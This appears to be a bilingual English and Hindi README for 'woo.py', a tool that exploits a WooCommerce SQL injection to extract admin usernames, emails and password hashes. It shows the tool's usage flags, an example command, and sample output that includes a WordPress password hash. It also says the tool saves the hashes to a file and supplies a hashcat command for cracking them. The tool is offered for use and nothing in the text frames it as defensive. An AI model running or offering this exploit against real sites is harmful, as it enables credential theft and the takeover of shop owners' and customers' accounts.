
Exploit woocommerce SQLI and grab user and password hash
https://wpscan.com/vulnerability/1212fec8-1fde-41e5-af70-abdd7ffe5379
woocommerce SQLI का शोषण करें और उपयोगकर्ता तथा पासवर्ड हैश प्राप्त करें
usage: woo.py [-h] [-u URL] [-f FILE] [-p PROXY] [-i WID]
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL URL to test
-f FILE, --file FILE File of urls
-p PROXY, --proxy PROXY
Proxy for debugging
-i WID, --wid WID User ID of User
python3 woo.py -u https://www.website.com -i 1
Admin ID: 2
Admin Username: [email protected]
Admin Email Address: [email protected]
Admin Password Hash:$P$BIAtNs11r0CBJZxa3B1JLrFd5C9f7r/
हर बार इसे चलाने पर यह हैश को wphash.has में लिखता है और आपको उन्हें क्रैक करने के लिए एक hash cat कमांड देता है